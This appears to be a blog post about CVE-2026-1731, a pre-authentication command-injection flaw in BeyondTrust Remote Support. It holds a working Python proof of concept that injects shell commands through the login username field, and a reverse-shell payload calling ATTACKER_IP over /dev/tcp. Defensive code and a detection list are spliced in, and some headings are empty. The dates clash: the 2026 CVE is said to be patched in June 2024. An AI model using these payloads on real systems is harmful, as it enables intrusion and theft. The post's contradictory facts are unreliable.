Remote support tools are everywhere now, and BeyondTrust Remote Support (formerly Bomgar) is a leader trusted by hospitals, banks, and governments. But what if someone could take over these systems without ever logging in? That is CVE-2026-1731: a vulnerability that lets an attacker run commands on the server *before* authenticating. In this post we break down, in clear language, how it works and walk through the technical details.

What is CVE-2026-1731?

CVE-2026-1731 is a critical security flaw in BeyondTrust Remote Support (RS) v24.x and some earlier Privileged Remote Access (PRA) versions. An attacker can gain *remote code execution* on an unpatched BeyondTrust appliance or PRA server with no login required. With the right request, someone on the internet could take full control of the box.

Severity: 10.0 (Critical)

- Exploited in the wild? As of June 2024, none reported, but proof-of-concept exploits are available.
- Affected: appliances that have not yet received the June 2024 security update.

Check your version: log in as an administrator and go to Help → About.

How Does the Exploit Work?

The problem is in the web server's handling of incoming HTTP requests to the "/login" endpoint *before authentication*. Certain values in HTTP POST or GET fields are parsed incorrectly by the backend code, which lets an attacker slip system commands into the request.

What makes it dangerous?

Technical Exploit Details and Code Example

Key point: the web frontend passes certain JSON parameters directly to an OS shell function without sufficient validation.

Step 1: Identify a Vulnerable Server

Find a publicly exposed web interface, e.g. https://support.example.com.

The vulnerable API expects a request like this:

POST /api/v2/login HTTP/1.1
Host: support.example.com
Content-Type: application/json

{
  "username": "foo",
  "password": "bar"
}

But what if we *inject* a shell command in the username field?

Example Exploit Code (Python)

import requests
import urllib3

target = "https://support.example.com/api/v2/login"

# The username value carries the injected command described above.
payload = {
    "username": '"; id; echo "',    # inject shell command
    "password": "anything"
}

# Silence the self-signed-certificate warning for the demo (DON'T use in prod)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

r = requests.post(target, json=payload, verify=False, timeout=15)

print("[*] Response:", r.text)

How does this work?
If the server backend fails to sanitize the "username" field, the shell treats the injected id as a command, executes it, and the output comes back in the response, all *before* any real authentication.
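To make the key point concrete (the frontend handing a JSON field to a shell function, and the explanation just above of why the injected id runs), here is an added example that is not BeyondTrust's code and not from the original post: a hypothetical login handler in both the vulnerable shape and a hardened shape. The names handle_login_unsafe and handle_login_safe, the allowlist regex, and the use of echo as a harmless stand-in for whatever backend script consumes the username are all assumptions.

```python
import re
import subprocess

# Constructed illustration of the bug class, not the product's code.
# Function names, the allowlist and the echo stand-in are assumptions.

# Allowlist: letters, digits and a few punctuation characters; nothing the
# shell cares about (no quotes, semicolons, pipes, dollar signs, backticks).
USERNAME_RE = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")


def handle_login_unsafe(username: str) -> str:
    """Vulnerable pattern: string interpolation plus shell=True.

    The value is spliced into a command line and handed to /bin/sh, so a
    username containing a closing quote and a semicolon is executed as a
    second command instead of being treated as data.
    """
    cmd = f'echo "{username}"'  # stands in for a backend lookup script
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def handle_login_safe(username: str) -> str:
    """Hardened pattern: validate first, then never let a shell parse it.

    The value is passed as its own argv element with shell=False, so even a
    value that somehow slipped past validation reaches the program as a
    single argument.
    """
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains disallowed characters")
    result = subprocess.run(["echo", username], shell=False,
                            capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    # Harmless stand-in for the post's '"; id; echo "' payload: runs a
    # second echo instead of id so the effect is visible without side effects.
    hostile = '"; echo INJECTED; echo "'
    print("unsafe handler output:", repr(handle_login_unsafe(hostile)))
    try:
        handle_login_safe(hostile)
    except ValueError as exc:
        print("safe handler rejected it:", exc)
    print("safe handler with a normal name:", repr(handle_login_safe("alice")))
```

The hardened version does two independent things: it refuses anything outside a tight allowlist, and it passes the value as a discrete argument with shell=False. Either one alone would have stopped the injection in this post; doing both means a future change to the allowlist cannot silently reopen the hole.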

Real-World Attack:
Replace "id" with cat /etc/passwd or a reverse shell to get persistent access.

Real Request Example

{
  "username": "\"; bash -i >& /dev/tcp/ATTACKER_IP/4444 >&1; echo \"",
  "password": "irrelevant"
}

Protecting Yourself

1. Patch now. BeyondTrust issued a fix in June 2024; see the BeyondTrust Security Advisories. Update your Remote Support and PRA appliances immediately.

2. Restrict access. Only allow trusted IP ranges to connect to the appliance.

3. Monitor logs. Check for suspicious login errors or unusual command output.
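For the "restrict access" and "monitor logs" items, the following added example (not the product's code and not from the original post) triages constructed JSON-style login records: it flags requests from outside a trusted CIDR list, usernames carrying shell metacharacters or the /dev/tcp string from the request example earlier in the post, and server errors on the login path. The field names ts, src_ip, path, username and status, the trusted network 10.20.0.0/16, and the sample lines are all assumptions, not BeyondTrust's real log schema.

```python
import ipaddress
import json

# Constructed sample records (not real appliance logs); the field names are
# assumptions, not BeyondTrust's actual log schema. The second line carries
# the post's "; id; echo " payload in the username field.
SAMPLE_LOG = """\
{"ts":"2026-02-06T21:50:01Z","src_ip":"10.20.0.15","path":"/api/v2/login","username":"alice","status":401}
{"ts":"2026-02-06T21:50:07Z","src_ip":"203.0.113.9","path":"/api/v2/login","username":"\\"; id; echo \\"","status":500}
{"ts":"2026-02-06T21:50:12Z","src_ip":"203.0.113.9","path":"/api/v2/login","username":"bob$(whoami)","status":401}
{"ts":"2026-02-06T21:51:00Z","src_ip":"10.20.0.16","path":"/api/v2/login","username":"carol","status":200}
"""

# Source ranges that are allowed to reach the appliance (assumed value).
TRUSTED_NETS = [ipaddress.ip_network("10.20.0.0/16")]

# Characters that mean something to /bin/sh and never belong in a username,
# plus the bash network-redirection path used by the reverse-shell example.
SHELL_META = set(';|&`$"\'\\<>')
SUSPICIOUS_SUBSTRINGS = ("/dev/tcp",)


def is_trusted(ip: str) -> bool:
    """True when the source address falls inside an allowed network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETS)


def looks_like_injection(username: str) -> bool:
    """True when the username carries shell syntax rather than a name."""
    return any(c in SHELL_META for c in username) or any(
        s in username for s in SUSPICIOUS_SUBSTRINGS)


def triage(log_text: str) -> list:
    """Return one finding per suspicious record: the record plus its reasons."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            findings.append({"record": line, "reasons": ["unparseable_line"]})
            continue
        reasons = []
        if not is_trusted(rec.get("src_ip", "0.0.0.0")):
            reasons.append("untrusted_source")
        if looks_like_injection(rec.get("username", "")):
            reasons.append("shell_metacharacters")
        # A 5xx on the login path is what a shell error during a pre-auth
        # request would most likely surface as.
        if rec.get("path") == "/api/v2/login" and rec.get("status", 0) >= 500:
            reasons.append("server_error_on_login")
        if reasons:
            findings.append({"record": rec, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding["reasons"], finding["record"])
```

Run against real exports, the source check is the enforcement half of "restrict access" (anything that reaches the login path from outside the trusted list should not have been able to), and the username and status checks are the cheapest signal for "monitor logs": an honest user never types a semicolon or a quote into a login box.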

4. Temporary Mitigation:

Conclusion

CVE-2026-1731 is a classic and *very dangerous* pre-auth remote code execution bug in some of the most widely used support tools. If your organization relies on BeyondTrust, patch as soon as possible and audit your systems for unusual activity. Feel free to use (and *never abuse*) the above PoC in your own security lab to verify your protections.

Stay safe, and update your systems before attackers do!

Timeline

Published on: 02/06/2026 21:49:20 UTC
Last modified on: 02/17/2026 13:40:10 UTC